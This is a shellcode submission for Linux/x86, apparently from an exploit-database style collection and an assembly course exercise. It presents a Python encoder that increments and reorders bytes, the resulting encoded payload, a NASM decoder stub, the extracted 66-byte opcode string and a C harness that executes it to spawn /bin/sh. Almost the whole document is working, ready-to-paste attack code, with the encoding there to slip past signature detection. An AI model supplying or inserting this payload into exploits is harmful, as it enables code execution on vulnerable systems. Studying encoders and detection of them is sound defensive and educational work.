# Title: Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)
# Author: Jonathan So
# Date: 15/06/2019
# Purpose: decode and spawn a /bin/sh shell
# Tested On: Linux kali 4.19.0-kali4-686 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) i686 GNU/Linux
# Arch: x86
# Size: 66 bytes
# Write-up Link: https://xmilkpowderx.github.io/2019-06-15-SLAEEX4/

======================================================Python Encoder======================================================

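#!/usr/bin/python
# Reposition + INC encoder for the execve(/bin/sh) payload below.
#
# Encoding scheme (must stay in sync with the NASM decoder):
#   1. every byte is incremented by one (modulo 256);
#   2. the bytes at odd positions (1st, 3rd, 5th, ...) are emitted first,
#      followed by the bytes at even positions (2nd, 4th, ...).
# The decoder undoes this with ceil(len/2) iterations, each taking one byte
# from each half and decrementing it.
#
# Runs under Python 2 and 3 (single-argument print, bytes literal, //).

# execve(/bin/sh), 25 bytes, null-free
shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")


def encode(data):
    """Encode `data` (bytes/bytearray) and return (c_string, nasm_db, half_len).

    c_string -- the encoded bytes as a "\\xNN" C/Python string literal body
    nasm_db  -- the same bytes as a "0xNN," list for a NASM `db` line
    half_len -- ceil(len(data) / 2): the loop count the decoder must use
                (the "Replace number" printed by the script)

    The increment wraps at 0xff, so an input byte 0xff encodes to 0x00
    (a bare `x + 1` followed by '%02x' would emit the three-digit escape
    "\\x100" and desynchronise the stream). A 0x00 in the output still
    breaks strlen()-based loaders such as the C PoC, so callers should
    check the result for it.
    """
    first_c, second_c = [], []
    first_db, second_db = [], []
    for pos, value in enumerate(bytearray(data), 1):
        value = (value + 1) & 0xff
        # Odd positions go to the first half, even positions to the second.
        if pos % 2:
            c_half, db_half = first_c, first_db
        else:
            c_half, db_half = second_c, second_db
        c_half.append('\\x%02x' % value)
        db_half.append('0x%02x,' % value)
    c_string = ''.join(first_c + second_c)
    nasm_db = ''.join(first_db + second_db)
    return c_string, nasm_db, (len(data) + 1) // 2


if __name__ == '__main__':
    print('Encoded shellcode ...')
    encoded, encoded_db, half_len = encode(shellcode)
    print(encoded)
    print(encoded_db)
    print('Len: %d' % len(shellcode))
    print('Replace number to: %d' % half_len)
    if '\\x00' in encoded:
        # A NUL byte would truncate the payload in the strlen()-based PoC.
        print('WARNING: encoded output contains 0x00 (an input byte was 0xff)')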

======================================================Encoded Shellcode======================================================

Original: \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80
Encoded: \x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce

========================================================Decoder.nasm=========================================================

; Reposition + INC decoder stub (NASM, Intel syntax, Linux/x86 32-bit).
;
; Layout: [41-byte decoder stub][25 encoded bytes] = 66 bytes, no 0x00.
; The stub rebuilds the original 25-byte execve(/bin/sh) payload on the
; stack at [esp] and jumps to it, so the target process needs an executable
; stack (e.g. the C PoC built with -z execstack).
;
; Encoding (see the Python encoder): every byte was incremented by one and
; the stream split into two halves: odd positions first (13 bytes), then
; even positions (12 bytes).
;
; Register roles inside the loop:
;   esi = read pointer into the first half (odd-position bytes)
;   edi = read pointer into the second half (even-position bytes)
;   edx = output buffer = esp at entry
;   eax = output index (0..25)
;   ebx = scratch; only bl is ever stored
;   ecx = loop counter
global _start

section .text
_start:

jmp short call_shellcode ;jmp/call/pop to obtain the address of EncodedShellcode
decoder:
pop esi ;esi = &EncodedShellcode (the return address pushed by `call decoder`)
lea edi, [esi + 13] ;edi = start of the second half; 13 = ceil(25/2) bytes in the first half
xor ebx, ebx
xor ecx, ecx
mul ecx ;eax = edx = 0 (eax * 0) without encoding an immediate 0x00
mov edx, esp ;decode onto the stack: overwrites [esp..esp+25], i.e. whatever the caller left there (in the PoC, the return address into main) and above
mov cl, 13 ;13 iterations x 2 bytes = 26 bytes written
decode: ;each iteration emits one byte from each half, restoring the original order
mov bl, byte[esi] ;odd-position byte from the first half
dec ebx ;undo the +1 (only bl is stored, so a borrow into the upper bytes is harmless)
mov byte[edx + eax], bl
inc eax
mov bl, byte[edi] ;even-position byte from the second half
dec ebx ;undo the +1
mov byte[edx + eax], bl
inc eax
inc esi
inc edi
loop decode
; NOTE: the payload length is odd (25), so the second half holds only 12
; bytes and the 13th iteration reads one byte past EncodedShellcode (in the
; C PoC that is the string's NUL terminator). The resulting byte lands after
; the payload's final `int 0x80` and is never executed, but the byte that
; follows the blob must be readable.

jmp edx ;run the decoded payload from the stack (executable stack required)

call_shellcode:

call decoder ;pushes &EncodedShellcode, popped into esi above
EncodedShellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce

======================================================objdump Generated Shellcode======================================================

\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c
\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69
\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce

============================================================Proof of Concept============================================================

#include<stdio.h>
#include<string.h>

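/*
 * Decoder stub (41 bytes) followed by the 25 encoded payload bytes:
 * 66 bytes in total, none of them 0x00, so strlen() sees the whole blob.
 * The stub decodes the execve(/bin/sh) payload onto the stack and jumps
 * there; the byte after the blob (here the literal's NUL terminator) is
 * read once by the decoder because the payload length is odd.
 */
unsigned char code[] =
"\xeb\x22\x5e\x8d\x7e\x0d\x31\xdb\x31\xc9\xf7\xe1\x89\xe2\xb1\x0d\x8a\x1e\x4b\x88\x1c\x02\x40\x8a\x1f\x4b\x88\x1c\x02\x40\x46\x47\xe2\xee\xff\xe2\xe8\xd9\xff\xff\xff\x32\x51\x30\x74\x69\x63\x6f\xe4\x8a\x54\xe2\x0c\x81\xc1\x69\x30\x69\x30\x6a\x8a\x51\xe3\x8a\xb1\xce";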

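/*
 * Proof of concept: print the blob length and jump into it.
 *
 * This only runs when the process may execute both the data page holding
 * code[] and the stack the decoder writes its output to, i.e. a build
 * without NX protections (e.g. gcc -fno-stack-protector -z execstack on
 * the 32-bit box named in the header). If the payload's execve() fails,
 * control falls off the end of the decoded bytes into whatever follows
 * them on the stack and the process will most likely crash.
 */
int main(void){
    /* strlen() stops at the first 0x00, so this doubles as a null-byte check (expected: 66). */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));
    int (*ret)(void) = (int(*)(void))code;
    ret();
    return 0;
}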